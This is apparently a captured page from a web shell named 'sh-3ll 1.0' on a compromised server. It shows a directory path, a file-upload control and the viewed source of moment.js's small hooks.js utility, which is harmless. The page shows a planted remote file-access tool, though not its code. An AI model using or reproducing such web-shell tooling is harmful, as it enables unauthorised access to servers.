HOME


sh-3ll 1.0
DIR:/proc/thread-self/root/proc/thread-self/cwd/assets/backend/plugins/moment/src/lib/utils/
Upload File :
Current File : //proc/thread-self/root/proc/thread-self/cwd/assets/backend/plugins/moment/src/lib/utils/hooks.js
export { hooks, setHookCallback };

var hookCallback;

function hooks () {
    return hookCallback.apply(null, arguments);
}

// This is done to register the method called with moment()
// without creating circular dependencies.
function setHookCallback (callback) {
    hookCallback = callback;
}